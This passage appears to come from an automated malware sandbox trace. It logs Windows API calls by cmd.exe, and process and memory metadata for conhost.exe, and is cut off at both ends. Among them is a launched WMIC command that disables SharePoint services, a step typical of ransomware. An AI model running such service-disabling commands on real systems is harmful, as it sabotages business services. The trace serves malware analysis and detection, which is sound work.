lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.337] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.337] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0121.337] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0121.337] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0121.337] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0121.337] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0121.337] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0121.337] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0121.337] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0121.337] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0121.338] GetEnvironmentStringsW () returned 0x5267e10* [0121.338] FreeEnvironmentStringsA (penv="A") returned 1 [0121.338] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.338] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.338] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0121.338] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0121.338] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0121.338] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0121.338] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0121.338] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0121.338] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0121.338] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0121.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4eff9ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0121.338] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4eff9ec, lpFilePart=0x4eff9e4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4eff9e4*="Desktop") returned 0x1d [0121.338] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0121.338] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4eff768 | out: lpFindFileData=0x4eff768) returned 0x52605c8 [0121.338] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0121.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4eff768 | out: lpFindFileData=0x4eff768) returned 0x52605c8 [0121.338] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0121.338] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0121.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4eff768 | out: lpFindFileData=0x4eff768) returned 0x52605c8 [0121.339] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0121.339] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0121.339] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0121.339] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0121.339] GetEnvironmentStringsW () returned 0x5267e10* [0121.339] FreeEnvironmentStringsA (penv="=") returned 1 [0121.339] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0121.339] GetConsoleOutputCP () returned 0x1b5 [0121.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0121.339] GetUserDefaultLCID () returned 0x409 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4effb1c, cchData=128 | out: lpLCData="0") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4effb1c, cchData=128 | out: lpLCData="0") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4effb1c, cchData=128 | out: lpLCData="1") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0121.340] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0121.340] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0121.341] GetConsoleTitleW (in: lpConsoleTitle=0x526ab00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.341] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0121.341] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0121.341] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0121.341] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0121.341] GetEnvironmentVariableW (in: lpName="SharePoint", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.341] _wcsicmp (_String1="SharePoint", _String2="CD") returned 16 [0121.341] _wcsicmp (_String1="SharePoint", _String2="ERRORLEVEL") returned 14 [0121.341] _wcsicmp (_String1="SharePoint", _String2="CMDEXTVERSION") returned 16 [0121.341] _wcsicmp (_String1="SharePoint", _String2="CMDCMDLINE") returned 16 [0121.342] _wcsicmp (_String1="SharePoint", _String2="DATE") returned 15 [0121.342] _wcsicmp (_String1="SharePoint", _String2="TIME") returned -1 [0121.342] _wcsicmp (_String1="SharePoint", _String2="RANDOM") returned 1 [0121.342] _wcsicmp (_String1="SharePoint", _String2="HIGHESTNUMANODENUMBER") returned 11 [0121.342] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0121.342] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0121.342] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0121.342] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0121.342] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0121.342] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0121.342] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0121.343] GetConsoleTitleW (in: lpConsoleTitle=0x4eff808, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.344] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0121.344] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0121.344] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0121.344] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0121.344] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0121.344] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0121.344] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0121.344] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0121.344] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0121.344] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0121.344] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0121.344] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0121.344] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0121.344] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0121.344] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0121.344] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0121.344] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0121.344] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0121.344] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0121.344] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0121.344] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0121.344] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0121.344] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0121.344] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0121.344] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0121.344] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0121.344] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0121.344] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0121.344] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0121.344] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0121.344] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0121.344] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0121.344] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0121.344] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0121.344] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0121.344] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0121.344] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0121.345] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0121.345] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0121.345] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0121.345] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0121.345] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0121.345] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0121.345] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0121.345] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0121.345] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0121.345] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0121.345] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0121.345] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0121.345] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0121.345] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0121.345] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0121.345] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0121.345] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0121.345] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0121.345] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0121.345] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0121.345] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0121.345] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0121.345] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0121.345] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0121.345] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0121.345] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0121.345] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0121.345] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0121.345] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0121.345] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0121.345] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0121.345] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0121.345] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0121.345] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0121.345] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0121.345] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0121.345] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0121.345] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0121.345] SetErrorMode (uMode=0x0) returned 0x0 [0121.346] SetErrorMode (uMode=0x1) returned 0x0 [0121.346] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52605d0, lpFilePart=0x4eff314 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4eff314*="Desktop") returned 0x1d [0121.346] SetErrorMode (uMode=0x0) returned 0x1 [0121.346] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0121.346] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0121.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.352] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0xffffffff [0121.352] GetLastError () returned 0x2 [0121.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.352] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0xffffffff [0121.352] GetLastError () returned 0x2 [0121.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.352] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0xffffffff [0121.353] GetLastError () returned 0x2 [0121.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0xffffffff [0121.353] GetLastError () returned 0x2 [0121.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0x526b2d0 [0121.353] FindClose (in: hFindFile=0x526b2d0 | out: hFindFile=0x526b2d0) returned 1 [0121.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0xffffffff [0121.353] GetLastError () returned 0x2 [0121.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4eff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4eff0a0) returned 0x526b2d0 [0121.353] FindClose (in: hFindFile=0x526b2d0 | out: hFindFile=0x526b2d0) returned 1 [0121.353] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0121.353] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0121.353] GetConsoleTitleW (in: lpConsoleTitle=0x4eff594, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.354] InitializeProcThreadAttributeList (in: lpAttributeList=0x4eff4c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4eff4a4 | out: lpAttributeList=0x4eff4c0, lpSize=0x4eff4a4) returned 1 [0121.354] UpdateProcThreadAttribute (in: lpAttributeList=0x4eff4c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4eff4ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4eff4c0, lpPreviousValue=0x0) returned 1 [0121.354] GetStartupInfoW (in: lpStartupInfo=0x4eff4f8 | out: lpStartupInfo=0x4eff4f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0121.354] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0121.354] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0121.355] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4eff448*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4eff494 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x4eff494*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xca4, dwThreadId=0xca0)) returned 1 [0121.362] CloseHandle (hObject=0xa4) returned 1 [0121.362] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0121.362] GetEnvironmentStringsW () returned 0x5269f78* [0121.362] FreeEnvironmentStringsA (penv="=") returned 1 [0121.362] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0123.362] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4eff42c | out: lpExitCode=0x4eff42c*=0x80041017) returned 1 [0123.362] CloseHandle (hObject=0xa8) returned 1 [0123.362] _vsnwprintf (in: _Buffer=0x4eff514, _BufferCount=0x13, _Format="%08X", _ArgList=0x4eff434 | out: _Buffer="80041017") returned 8 [0123.362] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041017") returned 1 [0123.362] GetEnvironmentStringsW () returned 0x526b400* [0123.362] FreeEnvironmentStringsA (penv="=") returned 1 [0123.362] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0123.362] GetEnvironmentStringsW () returned 0x526b400* [0123.362] FreeEnvironmentStringsA (penv="=") returned 1 [0123.362] DeleteProcThreadAttributeList (in: lpAttributeList=0x4eff4c0 | out: lpAttributeList=0x4eff4c0) [0123.363] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.363] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0123.364] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.364] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0123.364] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.364] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0123.364] SetConsoleInputExeNameW () returned 0x1 [0123.364] GetConsoleOutputCP () returned 0x1b5 [0123.364] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0123.364] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.364] exit (_Code=-2147217385) Thread: id = 321 os_tid = 0x518 Process: id = "74" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3eece000" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0xc44" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4794 start_va = 0x7f1c2000 end_va = 0x7f1c2fff entry_point = 0x0 region_type = private name = "private_0x000000007f1c2000" filename = "" Region: id = 4795 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4796 start_va = 0x4a10800000 end_va = 0x4a1081ffff entry_point = 0x0 region_type = private name = "private_0x0000004a10800000" filename = "" Region: id = 4797 start_va = 0x4a10820000 end_va = 0x4a10833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a10820000" filename = "" Region: id = 4798 start_va = 0x4a10840000 end_va = 0x4a1087ffff entry_point = 0x0 region_type = private name = "private_0x0000004a10840000" filename = "" Region: id = 4799 start_va = 0x7df5ff8b0000 end_va = 0x7ff5ff8affff entry_point = 0x0 region_type = 